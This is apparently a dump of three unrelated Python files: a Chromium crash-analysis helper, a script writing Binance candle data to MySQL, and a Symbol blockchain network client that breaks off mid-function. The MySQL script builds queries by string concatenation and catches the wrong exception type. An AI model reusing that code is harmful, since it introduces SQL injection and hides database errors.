# 'Source' but chromium uses 'src/', and blink component path is
# 'src/third_party/WebKit/Source', so add 'Source/' in front of the
# normalized path.
if (lower_component_path == 'src/third_party/webkit/source' and
not lower_normalized_path.startswith('source/')):
normalized_path = (current_component_path.split('/')[-2] + '/' +
normalized_path)
component_name = parsed_deps[component_path]['name']
return (component_path, component_name, normalized_path)
# If the path does not match any component, default to chromium.
return ('src/', 'chromium', normalized_path)
def SplitRange(regression):
"""Splits a range as retrieved from clusterfuzz.
Args:
regression: A string in format 'r1234:r5678'.
Returns:
A list containing two numbers represented in string, for example
['1234','5678'].
"""
if not regression:
return None
revisions = regression.split(':')
# If regression information is not available, return none.
if len(revisions) != 2:
return None
range_start = revisions[0]
range_end = revisions[1]
# Strip 'r' off the range start/end. Not using lstrip to avoid the case when
# the range is in git hash and it starts with 'r'.
if range_start.startswith('r'):
range_start = range_start[1:]
if range_end.startswith('r'):
range_end = range_end[1:]
return [range_start, range_end]
def LoadJSON(json_string):
"""Loads json object from string, or None.
Args:
json_string: A string to get object from.
Returns:
JSON object if the string represents a JSON object, None otherwise.
"""
try:
data = json.loads(json_string)
except ValueError:
data = None
return data
def GetDataFromURL(url):
"""Retrieves raw data from URL, tries 10 times.
Args:
url: URL to get data from.
retries: Number of times to retry connection.
Returns:
None if the data retrieval fails, or the raw data.
"""
status_code, data = utils.GetHttpClient().Get(url, retries=10)
if status_code == 200:
return data
else:
# Return None if it fails to read data.
return None
def FindMinLineDistance(crashed_line_list, changed_line_numbers,
line_range=3):
"""Calculates how far the changed line is from one of the crashes.
Finds the minimum distance between the lines that the file crashed on
and the lines that the file changed. For example, if the file crashed on
line 200 and the CL changes line 203,204 and 205, the function returns 3.
Args:
crashed_line_list: A list of lines that the file crashed on.
changed_line_numbers: A list of lines that the file changed.
line_range: Number of lines to look back for.
Returns:
The minimum distance. If either of the input lists is empty,
it returns inf.
"""
min_distance = INFINITY
crashed_line = -1
changed_line = -1
crashed_line_numbers = set()
for crashed_line_range in crashed_line_list:
for crashed_line in crashed_line_range:
for line in range(crashed_line - line_range, crashed_line + 1):
crashed_line_numbers.add(line)
for line in crashed_line_numbers:
for distance in changed_line_numbers:
# Find the current distance and update the min if current distance is
# less than current min.
current_distance = abs(line - distance)
if current_distance < min_distance:
min_distance = current_distance
crashed_line = line
changed_line = distance
return (min_distance, crashed_line, changed_line)
def GuessIfSameSubPath(path1, path2):
"""Guesses if two paths represent same path.
Compares the name of the folders in the path (by split('/')), and checks
if they match either more than 3 or min of path lengths.
Args:
path1: First path.
path2: Second path to compare.
Returns:
True if it they are thought to be a same path, False otherwise.
"""
path1 = path1.split('/')
path2 = path2.split('/')
intersection = set(path1).intersection(set(path2))
return len(intersection) >= (min(3, min(len(path1), len(path2))))
def FindMinStackFrameNumber(stack_frame_indices, priorities):
"""Finds the minimum stack number, from the list of stack numbers.
Args:
stack_frame_indices: A list of lists containing stack position.
priorities: A list of of priority for each file.
Returns:
Inf if stack_frame_indices is empty, minimum stack number otherwise.
"""
# Get the indexes of the highest priority (or low priority number).
highest_priority = min(priorities)
highest_priority_indices = []
for i in range(len(priorities)):
if priorities[i] == highest_priority:
highest_priority_indices.append(i)
# Gather the list of stack frame numbers for the files that change the
# crash lines.
flattened = []
for i in highest_priority_indices:
flattened += stack_frame_indices[i]
# If no stack frame information is available, return inf. Else, return min.
if not flattened:
return INFINITY
else:
return min(flattened)
def AddHyperlink(text, link):
"""Returns a string with HTML link tag.
Args:
text: A string to add link.
link: A link to add to the string.
Returns:
A string with hyperlink added.
"""
sanitized_link = cgi.escape(link, quote=True)
sanitized_text = cgi.escape(str(text))
return '<a href="%s">%s</a>' % (sanitized_link, sanitized_text)
def PrettifyList(items):
"""Returns a string representation of a list.
It adds comma in between the elements and removes the brackets.
Args:
items: A list to prettify.
Returns:
A string representation of the list.
"""
return ', '.join(map(str, items))
def PrettifyFrameInfo(frame_indices, functions):
"""Return a string to represent the frames with functions."""
frames = []
for frame_index, function in zip(frame_indices, functions):
frames.append('frame #%s, "%s"' % (frame_index, function.split('(')[0]))
return '; '.join(frames)
def PrettifyFiles(file_list):
"""Returns a string representation of a list of file names.
Args:
file_list: A list of tuple, (file_name, file_url).
Returns:
A string representation of file names with their urls.
"""
ret = ['\n']
for file_name, file_url in file_list:
ret.append(' %s\n' % AddHyperlink(file_name, file_url))
return ''.join(ret)
def Intersection(crashed_line_list, stack_frame_index, changed_line_numbers,
function, line_range=3):
"""Finds the overlap betwee changed lines and crashed lines.
Finds the intersection of the lines that caused the crash and
lines that the file changes. The intersection looks within 3 lines
of the line that caused the crash.
Args:
crashed_line_list: A list of lines that the file crashed on.
stack_frame_index: A list of positions in stack for each of the lines.
changed_line_numbers: A list of lines that the file changed.
function: A list of functions that the file crashed on.
line_range: Number of lines to look backwards from crashed lines.
Returns:
line_number_intersection: Intersection between crashed_line_list and
changed_line_numbers.
stack_frame_index_intersection: Stack number for each of the intersections.
"""
line_number_intersection = []
stack_frame_index_intersection = []
function_intersection = []
# Iterate through the crashed lines, and its occurence in stack.
for (lines, stack_frame_index, function_name) in zip(
crashed_line_list, stack_frame_index, function):
# Also check previous 'line_range' lines. Create a set of all changed lines
# and lines within 3 lines range before the crashed line.
line_minus_n = set()
for line in lines:
for line_in_range in range(line - line_range, line + 1):
line_minus_n.add(line_in_range)
for changed_line in changed_line_numbers:
# If a CL does not change crahsed line, check next line.
if changed_line not in line_minus_n:
continue
intersected_line = set()
# If the changed line is exactly the crashed line, add that line.
for line in lines:
if line in changed_line_numbers:
intersected_line.add(line)
# If the changed line is in 3 lines of the crashed line, add the line.
else:
intersected_line.add(changed_line)
# Avoid adding the same line twice.
if intersected_line not in line_number_intersection:
line_number_intersection.append(list(intersected_line))
stack_frame_index_intersection.append(stack_frame_index)
function_intersection.append(function_name)
break
return (line_number_intersection, stack_frame_index_intersection,
function_intersection)
def MatchListToResultList(matches):
"""Convert list of matches to the list of result objects.
Args:
matches: A list of match objects along with its stack priority and revision
number/git hash
Returns:
A list of result object.
"""
result_list = []
for _, cl, match in matches:
suspected_cl = cl
revision_url = match.revision_url
component_name = match.component_name
author = match.author
reason = match.reason.strip()
review_url = match.review_url
reviewers = match.reviewers
# For matches, line content do not exist.
line_content = None
message = match.message
time = match.time
result = Result(suspected_cl, revision_url, component_name, author, reason,
review_url, reviewers, line_content, message, time)
result_list.append(result)
return result_list
def BlameListToResultList(blame_list):
"""Convert blame list to the list of result objects.
Args:
blame_list: A list of blame objects.
Returns:
A list of result objects.
"""
result_list = []
for blame in blame_list:
suspected_cl = blame.revision
revision_url = blame.url
component_name = blame.component_name
author = blame.author
reason = (
'The CL last changed line %s of file %s, which is stack frame %d.' %
(blame.line_number, blame.file, blame.stack_frame_index))
time = blame.time
# Blame object does not have review url and reviewers.
review_url = None
reviewers = None
line_content = blame.line_content
message = blame.message
result = Result(suspected_cl, revision_url, component_name, author, reason,
review_url, reviewers, line_content, message, time)
result_list.append(result)
return result_list
|
write_db.py | import json
import threading
import loguru
import mysql.connector
import websocket
from binance.client import Client
import LineNotify as Notify
websocket.enableTrace(True)
### SETTING
file_name = "config.json"
with open(file_name, "r") as f:
data = json.load(f)
host = data["host"]
port = data["port"]
user = data["user"]
password = data["password"]
Line_Notify_Token = data["Line_token"]
### Write Database
def write_database(symbol, Time, open_price, high_price, low_price, close_price, volume):
conn = mysql.connector.connect(host = host, port = port, user = user, password = password, database = "SPOT", auth_plugin = "mysql_native_password")
cursor = conn.cursor()
search = '''select * from ''' + symbol + ''' where Time="''' + str(Time) + '''"'''
cursor.execute(search)
result = cursor.fetchall()
if len(result) == 0:
try:
sql = '''INSERT INTO ''' + symbol + ''' (Time,Open,High,Low,Close,Volume) VALUES (%s,%s,%s,%s,%s,%s)'''
val = (Time,open_price,high_price,low_price,close_price,volume)
cursor.execute(sql,val)
conn.commit()
loguru.logger.success("Write Database : success")
except json.decoder.JSONDecodeError:
loguru.logger.error( symbol + "\a Write Database Error! ")
pass
if len(result) > 0:
try:
sql = '''UPDATE ''' + symbol + ''' set Time="''' + str(Time) + '''",Open="''' + str(open_price) + '''",High="''' + str(high_price) + '''",Low="''' + str(low_price) + '''",Close="''' + str(close_price) + '''",Volume="''' + str(volume) + '''" where Time="''' + str(Time) + '''"'''
cursor.execute(sql)
conn.commit()
loguru.logger.success("UPDATE Database : success")
except json.decoder.JSONDecodeError:
loguru.logger.error( symbol + "\a Write Database Error! ")
pass
print(symbol,Time,open_price,high_price,low_price,close_price,volume)
def on_open(ws):
loguru.logger.trace(" Connection is opened! ")
def on_message(ws, message):
def run(*args):
jsLoads = json.loads(message)
interval = jsLoads['data']['k']['i']
symbol = jsLoads['data']['k']['s']
Time = jsLoads['data']['k']['t']
open_price = jsLoads['data']['k']['o']
high_price = jsLoads['data']['k']['h']
low_price = jsLoads['data']['k']['l']
close_price = jsLoads['data']['k']['c']
volume = jsLoads['data']['k']['v']
loguru.logger.info(" Pair " + symbol + " Get new KLINES Tick ! ")
write_database(symbol, Time, open_price, high_price, low_price, close_price, volume)
threading.Thread(target=run).start()
def on_error(ws, error):
Notify.SendMessageToLineNotify(error,Line_Notify_Token)
def on_close(ws):
loguru.logger.warning(" Connection is closed! ")
Notify.SendMessageToLineNotify(" Write database program Connection is closed! ",Line_Notify_Token)
while True:
try:
### Streams
streams = ""
conn = mysql.connector.connect(host = host, port = port, user = user, password = password, database = "symbol", auth_plugin = "mysql_native_password" )
cursor = conn.cursor()
sql_read_data = "SELECT * FROM SPOT"
cursor.execute(sql_read_data)
result = cursor.fetchall()
conn.close()
for i in range(len(result)):
a = result[i][0]
if i != int(len(result)-1):
streams = streams + str(a.lower()) + "@kline_5m/"
if i == int(len(result)-1):
streams = streams + str(a.lower()) + "@kline_5m"
### Binance Websocket API
socket = "wss://stream.binance.com/stream?streams=" + streams
print(socket)
ws = websocket.WebSocketApp(socket, on_open=on_open, on_message=on_message, on_error = on_error, on_close=on_close)
ws.run_forever()
except Exception as error:
print("Error!!!")
Notify.SendMessageToLineNotify(error,Line_Notify_Token)
|
network.py | import asyncio
import datetime
import json
import logging
import multiprocessing
import threading
import time
import re
from base64 import b32encode
from binascii import unhexlify
from http import HTTPStatus
from typing import Optional, Union, List, Callable, Dict
from urllib.parse import urlparse
from requests.exceptions import RequestException
import requests
import websockets
from nempy.sym.constants import BlockchainStatuses, EPOCH_TIME_TESTNET, EPOCH_TIME_MAINNET, NetworkType, \
TransactionTypes, AccountValidationState
from pydantic import BaseModel, StrictInt, StrictFloat
from symbolchain.core.CryptoTypes import Hash256
from symbolchain.core.facade.SymFacade import SymFacade
from tabulate import tabulate
from websockets import exceptions
from . import ed25519, constants, config
from .constants import TransactionStatus
logger = logging.getLogger(__name__)
class SymbolNetworkException(Exception):
"""Is one exception for the convenience of working with the blockchain network"""
codes = {
'ResourceNotFound': 404,
'InvalidAddress': 409,
'InvalidArgument': 409,
'InvalidContent': 400,
'Internal': 500,
}
def __init__(self, code, message):
self.code = self.codes.get(code)
self.name = code
self.message = message
super(SymbolNetworkException, self).__init__(f'{self.code} - {self.name}', self.message)
def url_validation(url):
"""django URL validation regex
Raise an exception if the url is not valid"""
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
if re.match(regex, url) is None:
raise ValueError(f'`{url}` is not a valid URL')
def mosaic_id_to_name_n_real(mosaic_id: str, amount: int) -> Dict[str, float]:
"""
Converts mosaic identifiers to names and integer numbers to real numbers.
Parameters
----------
mosaic_id
Mosaic ID as string
amount
Mosaic units in Symbol are defined as absolute amounts. To get an absolute amount,
multiply the amount of assets you want to create or send by 10^divisibility.
For example, if the mosaic has divisibility 2, to create or send 10 units (relative)
you should define 1,000 (absolute) instead.
Returns
-------
Dict[str, float]
A dictionary with a name and a real amount value. For example
```py
{'id': 'symbol.xym', 'amount': 1.1}
```
"""
if not isinstance(amount, int):
raise TypeError('To avoid confusion, automatic conversion to integer is prohibited')
divisibility = get_divisibility(mosaic_id)
divider = 10 ** int(divisibility)
mn = get_mosaic_names(mosaic_id)
name = mosaic_id
names = mn['mosaicNames'][0]['names']
if len(names) > 0:
name = names[0]
return {'id': name, 'amount': float(amount / divider)}
class Meta(BaseModel):
"""Transaction meta information"""
height: int
hash: str
merkleComponentHash: str
index: int
class MosaicInfo(BaseModel):
"""Mosaic information in a transaction"""
id: str
amount: Union[StrictInt, StrictFloat]
def __str__(self):
return f'{self.amount}({self.id})'
class TransactionInfo(BaseModel):
"""Contains information about transactions of the blockchain network"""
size: int
signature: str
signerPublicKey: str
version: int
network: int
type: Union[int, str]
maxFee: int
deadline: Union[int, datetime.datetime]
recipientAddress: str
message: Optional[str]
signer_address: Optional[str]
mosaics: List[MosaicInfo]
def humanization(self):
"""Converts information from the blockchain into a readable form"""
self.deadline = Timing().deadline_to_date(self.deadline)
if self.message is not None:
self.message = unhexlify(self.message)[1:].decode('utf-8')
self.recipientAddress = b32encode(unhexlify(self.recipientAddress)).decode('utf-8')[:-1]
self.mosaics = [MosaicInfo(**mosaic_id_to_name_n_real(mosaic.id, mosaic.amount)) for mosaic in self.mosaics]
self.type = TransactionTypes.get_type_by_id(self.type).name
facade = SymFacade(node_selector.network_type.value)
self.signer_address = str(facade.network.public_key_to_address(Hash256(self.signerPublicKey)))
class TransactionResponse(BaseModel):
id: str
meta: Meta
transaction: TransactionInfo
status: Optional[str]
def __str__(self):
if self.transaction.signer_address.startswith('T'):
test_net_explorer = 'http://explorer.testnet.symboldev.network/transactions/'
else:
test_net_explorer = 'http://explorer.symbolblockchain.io/transactions/'
prepare = list()
mosaics = [str(mosaic) for mosaic in self.transaction.mosaics]
mosaics = '\n'.join(mosaics)
prepare.append(['Type:', self.transaction.type.title()])
prepare.append(['Status:', self.status.title()])
prepare.append(['Hash:', f'{test_net_explorer}{self.meta.hash}'])
prepare.append(['Paid Fee:', f'{self.transaction.maxFee / 1000000}(XYM)'])
prepare.append(['Height:', self.meta.height])
prepare.append(['Deadline:', self.transaction.deadline])
prepare.append(['Signature:', self.transaction.signature])
prepare.append(['Signer Public Key:', self.transaction.signerPublicKey])
prepare.append(['From:', self.transaction.signer_address])
prepare.append(['To:', self.transaction.recipientAddress])
prepare.append(['Mosaic:', mosaics])
prepare.append(['Message:', self.transaction.message])
table = tabulate(prepare, headers=['Property', 'Value'], tablefmt='grid')
return table
def send_transaction(payload: bytes) -> bool:
"""Announces a transaction to the network"""
try:
headers = {'Content-type': 'application/json'}
answer = requests.put(f'{node_selector.url}/transactions', data=payload, headers=headers, timeout=10)
if answer.status_code != HTTPStatus.ACCEPTED:
raise SymbolNetworkException(**answer.json())
except (RequestException, SymbolNetworkException) as e:
logger.exception(e)
return False
else:
return True
def get_mosaic_names(mosaics_ids: Union[list, str]) -> Optional[dict]:
"""
Get readable names for a set of mosaics.
Parameters
----------
mosaics_ids
IDs of mosaic as list or str if there is only one mosaic
Returns
-------
Optional[Dict[str, list]]
dict of mosaics. For example:
```py
{"mosaicNames": [{"mosaicId": "091F837E059AE13C", "names": ["symbol.xym"]}]}
```
"""
if isinstance(mosaics_ids, str):
mosaics_ids = [mosaics_ids]
try:
for mosaic_id in mosaics_ids:
if not ed25519.check_hex(mosaic_id, constants.HexSequenceSizes.MOSAIC_ID):
raise SymbolNetworkException('InvalidArgument', f'mosaicId `{mosaic_id}` has an invalid format')
payload = {'mosaicIds': mosaics_ids}
headers = {'Content-type': 'application/json'}
answer = requests.post(f'{node_selector.url}/namespaces/mosaic/names', json=payload, headers=headers, timeout=10)
if answer.status_code != HTTPStatus.OK:
raise SymbolNetworkException(**answer.json())
except (RequestException, SymbolNetworkException) as e:
logger.exception(e)
raise
else:
return answer.json()
def get_accounts_info(address: str) -> Optional[dict]:
try:
if (avs := ed25519.check_address(address)) != AccountValidationState.OK:
raise SymbolNetworkException('InvalidAddress', f'Incorrect account address: `{address}`: {avs}')
endpoint = f'{node_selector.url}/accounts/{address}'
answer = requests.get(endpoint)
if answer.status_code != HTTPStatus.OK:
return None
except RequestException as e:
logger.exception(e)
raise
except SymbolNetworkException as e:
logger.exception(e)
raise
else:
return answer.json()
def search_transactions(address: Optional[str] = None,
recipient_address: Optional[str] = None,
signer_public_key: Optional[str] = None,
height: Optional[int] = None,
from_height: Optional[int] = None,
to_height: Optional[str] = None,
from_transfer_amount: Optional[str] = None,
to_transfer_amount: Optional[str] = None,
type: int = 16724,
embedded: bool = False,
transfer_mosaic_id: Optional[str] = None,
page_size: int = 10,
page_number: int = 1,
offset: Optional[str] = None,
order: str = 'desc',
transaction_status: TransactionStatus = TransactionStatus.CONFIRMED_ADDED
) -> Optional[list]:
params = {
'address': address,
'recipientAddress': recipient_address,
'signerPublicKey': signer_public_key,
'height': height,
'fromHeight': from_height,
'toHeight': to_height,
'fromTransferAmount': from_transfer_amount,
'toTransferAmount': to_transfer_amount,
'type': type,
'embedded': str(embedded).lower(),
'transferMosaicId': transfer_mosaic_id,
'pageSize': page_size,
'pageNumber': page_number,
'offset': offset,
'order': order
}
payload = {key: val for key, val in params.items() if val is not None}
endpoint = f'{node_selector.url}/transactions/{transaction_status.value}'
try:
answer = requests.get(endpoint, params=payload)
if answer.status_code != HTTPStatus.OK:
raise SymbolNetworkException(**answer.json())
except RequestException as e:
logger.exception(e)
raise
except SymbolNetworkException as e:
logger.exception(e)
raise
transactions = answer.json()
transactions_response = []
for transaction in transactions['data']:
mosaics = [MosaicInfo(id=mosaic['id'], amount=int(mosaic['amount'])) for mosaic in transaction['transaction']['mosaics']]
del(transaction['transaction']['mosaics'])
_transaction = TransactionResponse(id=transaction['id'],
meta=Meta(**transaction['meta']),
transaction=TransactionInfo(mosaics=mosaics, **transaction['transaction'])
)
_transaction.status = transaction_status.value
transactions_response.append(_transaction)
_transaction.transaction.humanization()
return transactions_response
def get_namespace_info(namespace_id: str) -> Optional[dict]:
endpoint = f'{node_selector.url}/namespaces/{namespace_id}'
try:
answer = requests.get(endpoint)
except Exception as e:
logger.error(e)
return None
if answer.status_code != HTTPStatus.OK:
logger.error(answer.text)
if answer.status_code == HTTPStatus.NOT_FOUND:
logger.error(f'Invalid namespace ID `{namespace_id}`')
return {}
return None
namespace_info = answer.json()
return namespace_info
def check_transaction_state(transaction_hash):
timeout = 10
check_order = ['confirmed', 'unconfirmed', 'partial']
status = TransactionStatus.NOT_FOUND
for checker in check_order:
endpoint = f'{node_selector.url}/transactions/{checker}/{transaction_hash}'
try:
answer = requests.get(endpoint, timeout=timeout)
if answer.status_code != 200:
raise SymbolNetworkException(**answer.json())
except (RequestException, SymbolNetworkException) as e:
if isinstance(e, SymbolNetworkException) and e.code == 404:
return TransactionStatus.NOT_FOUND
logger.exception(e)
raise
else:
if checker == 'confirmed':
status = TransactionStatus.CONFIRMED_ADDED
elif checker == 'unconfirmed':
status = TransactionStatus.UNCONFIRMED_ADDED
elif checker == 'partial':
status = TransactionStatus.PARTIAL_ADDED
return status
def get_network_properties():
answer = requests.get(f'{node_selector.url}/network/properties')
if answer.status_code == HTTPStatus.OK:
network_properties = answer.json()
return network_properties
answer.raise_for_status()
def get_node_network():
try:
answer = requests.get(f'{node_selector.url}/node/info')
except RequestException as e:
logger.exception(e)
raise
if answer.status_code == HTTPStatus.OK:
fee_info = answer.json()
network_generation_hash_seed = fee_info['networkGenerationHashSeed']
if network_generation_hash_seed == constants.NETWORK_GENERATION_HASH_SEED_TEST:
return NetworkType.TEST_NET
elif network_generation_hash_seed == constants.NETWORK_GENERATION_HASH_SEED_PUBLIC:
return NetworkType.MAIN_NET
else:
return None
answer.raise_for_status()
def get_block_information(height: int):
answer = requests.get(f'{node_selector.url}/blocks/{height}')
if answer.status_code == HTTPStatus.OK:
block_info = answer.json()
return block_info
answer.raise_for_status()
def get_fee_multipliers():
try:
answer = requests.get(f'{node_selector.url}/network/fees/transaction')
except RequestException as e:
logger.exception(e)
return None
if answer.status_code == HTTPStatus.OK:
fee_multipliers = answer.json()
return fee_multipliers
return None
def get_divisibility(mosaic_id: str) -> Optional[int]:
try:
if not ed25519.check_hex(mosaic_id, constants.HexSequenceSizes.MOSAIC_ID):
raise SymbolNetworkException('InvalidArgument', f'mosaicId `{mosaic_id}` has an invalid format')
answer = requests.get(f'{node_selector.url}/mosaics/{mosaic_id}')
if answer.status_code == HTTPStatus.OK:
node_info = answer.json()
divisibility = int(node_info['mosaic']['divisibility'])
else:
raise SymbolNetworkException(**answer.json())
except RequestException as e:
logger.exception(e)
raise
except SymbolNetworkException as e:
logger.exception(e)
raise
else:
return divisibility
def get_divisibilities(n_pages: int = 0):
mosaics = {}
payload = {'pageSize': 100}
page_count = 1
while True:
try:
answer = requests.get(f'{node_selector.url}/mosaics', params=payload)
except Exception as e:
logger.error(e)
return None
if answer.status_code == HTTPStatus.OK:
mosaics_pages = answer.json()['data']
if len(mosaics_pages) == 0:
return mosaics
last_page = None
for page in mosaics_pages:
mosaic_id = page['mosaic']['id']
divisibility = page['mosaic']['divisibility']
mosaics[mosaic_id] = divisibility
last_page = page
payload['offset'] = last_page['id']
page_count = page_count + 1 if n_pages else page_count
if page_count > n_pages:
return mosaics
def get_balance(address: str) -> Optional[dict]:
try:
address_info = get_accounts_info(address)
if address_info is None:
return {}
mosaics = address_info['account']['mosaics']
balance = {mosaic['id']: int(mosaic['amount']) / 10 ** get_divisibility(mosaic['id']) for mosaic in mosaics}
except (SymbolNetworkException, RequestException) as e:
if isinstance(e, SymbolNetworkException) and e.code == 404:
return {}
raise
else:
return balance
class Monitor:
"""Allows you to subscribe to events on the blockchain network"""
where_to_subscribe = {
'confirmedAdded': 'address',
'unconfirmedAdded': 'address',
'unconfirmedRemoved': 'address',
'partialAdded': 'address',
'partialRemoved': 'address',
'cosignature': 'address',
'status': 'address',
'block': None,
'finalizedBlock': None
}
def __init__(self,
url: str,
subscribers: List[str],
formatting: bool = False,
log: str = '',
callback: Optional[Callable] = None):
self.url = url
self.subscribers = subscribers
self.formatting = formatting
self.log = log
self.callback = callback
loop = asyncio.get_event_loop()
loop.run_until_complete(self.monitoring())
async def monitoring(self):
result = urlparse(self.url)
url = f"ws://{result.hostname}:{result.port}/ws"
print(f'MONITORING: {url}')
try:
async with websockets.connect(url) as ws:
response = json.loads(await ws.recv())
print(f'UID: {response["uid"]}')
if 'uid' in response:
prepare = []
for subscriber in self.subscribers:
added = json.dumps({"uid": response["uid"], "subscribe": f"{subscriber}"})
await ws.send(added)
# print(f'Subscribed to: {subscriber}')
prepare.append([subscriber])
table = tabulate(prepare, headers=['Subscribers'], tablefmt='grid')
print(table)
print('Listening... `Ctrl+C` for abort')
while True:
res = await ws.recv()
if self.formatting:
res = json.dumps(json.loads(res), indent=4)
if self.callback is not None:
self.callback(json.loads(res))
continue
print(res)
if self.log:
with open(self.log, 'a+') as f:
res += '\n'
f.write(res)
except exceptions.WebSocketException as e:
logger.exception(e)
raise
class Timing:
"""Works with network time"""
def __init__(self, network_type: Optional[NetworkType] = None):
if network_type is None:
network_type = node_selector.network_type
if network_type == NetworkType.TEST_NET:
self.epoch_time = EPOCH_TIME_TESTNET
elif network_type == NetworkType.MAIN_NET:
self.epoch_time = EPOCH_TIME_MAINNET
else:
raise EnvironmentError('It is not possible to determine the type of network')
def calc_deadline(self, days: float = 0, seconds: float = 0, milliseconds: float = 0,
minutes: float = 0, hours: float = 0, weeks: float = 0) -> int:
if days + seconds + milliseconds + minutes + hours + weeks <= 0:
raise TimeoutError('Added time must be positive otherwise the transaction will not have time to process')
# perhaps this code will be needed if you need to get time from a node
# node_info = json.loads(requests.get(endpoint).text)
# receive_timestamp = int(node_info['communicationTimestamps']['receiveTimestamp'])
# td = datetime.timedelta(milliseconds=receive_timestamp)
now = datetime.datetime.now(tz=datetime.timezone.utc)
td = now - self.epoch_time
td += datetime.timedelta(days=days, seconds=seconds,
milliseconds=milliseconds, minutes=minutes,
hours=hours, weeks=weeks)
deadline = int(td.total_seconds() * 1000)
return deadline
def deadline_to_date(self, deadline: int, is_local: bool = False) -> datetime:
def utc2local(utc):
utc_epoch = time.mktime(utc.timetuple())
offset = datetime.datetime.fromtimestamp(utc_epoch) - datetime.datetime.utcfromtimestamp(utc_epoch)
return utc + offset
deadline = int(deadline)
epoch_timestamp = datetime.datetime.timestamp(self.epoch_time)
deadline_date_utc = datetime.datetime.utcfromtimestamp(epoch_timestamp + deadline / 1000)
if is_local:
local_deadline_date = utc2local(deadline_date_utc)
return local_deadline_date
return deadline_date_utc
class Thread:
"""A helper class for working with a thread, starting and stopping it by signals"""
def __init__(self):
self.stop_event: Optional[threading.Event] = None
self.thread: Optional[threading.Thread] = None
self.is_started = False
self.updated = threading.Event()
def stop(self):
if self.thread is not None and self.thread.is_alive():
self.stop_event.set()
self.thread.join()
self.is_started = False
logger.debug(f'The node actualization thread {self.thread.name} has been stopped.')
def start(self, func: Callable, interval: int = 3600):
self.is_started = True
self.stop_event = threading.Event()
self.updated = threading.Event()
params = {'interval': interval, 'stop_event': self.stop_event, 'updated': self.updated}
self.thread = threading.Thread(target=func, kwargs=params, daemon=True)
self.thread.start()
logger.debug(f'New actualizer thread started: {self.thread.name}')
return self
def wait(self):
updated_is_set = self.updated.wait(60)
if not updated_is_set:
raise RuntimeError('Very long waiting time for node selection')
class NodeSelector:
"""Works with a list of nodes in both the main and test networks.
Offline finds the best connection options and makes adjustments if conditions change.
Also allows you to add connections manually.
"""
_URL: Optional[str] = None
_URLs: Optional[list] = None
is_elections: bool = False
_network_type: NetworkType = NetworkType.TEST_NET
def __init__(self, node_urls: Union[List[str], str]):
self.thread = Thread()
self.url = node_urls
@property
def url(self):
while self.is_elections:
time.sleep(0.1)
return self._URL
@url.setter
def url(self, urls: Union[list, str]):
self.is_elections = True
self.thread.stop()
if isinstance(urls, str):
urls = [urls]
for url in urls:
url_validation(url)
self._URLs = urls
if len(self._URLs) == 1:
self._URL = self._URLs[0] # setting a single URL value
logger.debug(f'Installed node: {self._URL}')
else:
self.thread.start(self.node_actualizer, interval=3600).wait()
self.is_elections = False
def node_actualizer(self, interval, stop_event, updated):
while True:
self.reelection_node()
updated.set()
event_is_set = stop_event.wait(interval)
if event_is_set:
break
def reelection_node(self):
asyncio.set_event_loop(asyncio.new_event_loop())
logger.debug('Node reselecting...')
heights = [NodeSelector.get_height(url) for url in self._URLs]
max_height = max(heights)
heights_filter = [True if height >= max_height * 0.97 else False for height in heights]
# filtered by block height - 97%
filtered_by_height = [url for i, url in enumerate(self._URLs) if heights_filter[i]]
urls_p_h = {url: (NodeSelector.ping(url), NodeSelector.simple_health(url)) for url in filtered_by_height}
# Remove non-working nodes from the dict
working = {key: val for key, val in urls_p_h.items() if val[1]}
_sorted_URLs = [k for k, v in sorted(working.items(), key=lambda item: item[1][0])]
new_url = _sorted_URLs[0] if len(_sorted_URLs) > 0 else None
if new_url != self._URL and self._URL is not None:
logger.warning(f'Reselection node: {self._URL} -> {new_url}')
if new_url is None:
logger.error('It was not possible to select the current node from the list of available ones')
self._URL = new_url
logger.debug(f'Selected node: {self._URL}')
@property
def network_type(self):
return self._network_type
@network_type.setter
def network_type(self, network_type):
if network_type == self.network_type:
return
self._network_type = network_type
if self._network_type == NetworkType.MAIN_NET:
logger.debug('Switch to MAIN network')
self.url = config.MAIN_NODE_URLs
elif self._network_type == NetworkType.TEST_NET:
logger.debug('Switch to TEST network')
self.url = config.TEST_NODE_URLs
else:
raise TypeError('Unknown network type')
@staticmethod
def health(url) -> BlockchainStatuses:
"""
Returns the statuses of node services
Parameters
----------
url
URL node in the form of http://ngl-dual-001.testnet.symboldev.network:3000
Returns
-------
BlockchainStatuses
The statuses of node services
```py
BlockchainStatuses.DB_FAILURE
BlockchainStatuses.NO_NODES_AVAILABLE
BlockchainStatuses.NOT_INITIALIZED
BlockchainStatuses.REST_FAILURE
BlockchainStatuses.OK
BlockchainStatuses.UNKNOWN
```
"""
if url is None:
return BlockchainStatuses.NO_NODES_AVAILABLE
try:
answer = requests.get(f'{url}/node/health', timeout=1)
except Exception as e:
logger.exception(e)
return BlockchainStatuses.REST_FAILURE
if answer.status_code == HTTPStatus.OK:
node_info = answer.json()
if node_info['status']['apiNode'] == 'up' and node_info['status']['db'] == 'up':
return BlockchainStatuses.OK
if node_info['status']['apiNode'] == 'down':
return BlockchainStatuses.NODE_FAILURE
if node_info['status']['db'] == 'down':
return BlockchainStatuses.DB_FAILURE
return BlockchainStatuses.UNKNOWN
@staticmethod
def simple_health(url) -> bool:
health_status = NodeSelector.health(url)
if health_status == BlockchainStatuses.OK:
return True
return False
@staticmethod
def get_height(url) -> int:
"""
Returns the last block known to the node
Parameters
----------
url
URL node in the form of http://ngl-dual-001.testnet.symboldev.network:3000
Returns
-------
"""
try:
answer = requests.get(f'{url}/chain/info', timeout=1)
except Exception:
return 0
node_info = answer.json()
height = node_info['height']
return int(height)
@staticmethod
def ping(url) -> Optional[float]:
"""Calculate and return a latency point using sockets"""
if multiprocessing.current_process().daemon:
asyncio.set_event_loop(asyncio.new_event_loop())
parse_result = urlparse(url)
loop = asyncio.get_event_loop()
latency = loop.run_until_complete(NodeSelector.measure_latency(host=parse_result.hostname, port=parse_result.port, runs=3))
if (result := len(list(filter(None, latency)))) == 0:
return None
average = sum(filter(None, latency)) / result
return average
@staticmethod
async def measure_latency(
host: str,
port: int = 443,
timeout: float = 5,
runs: int = 1,
wait: float = 0,
) -> list:
"""
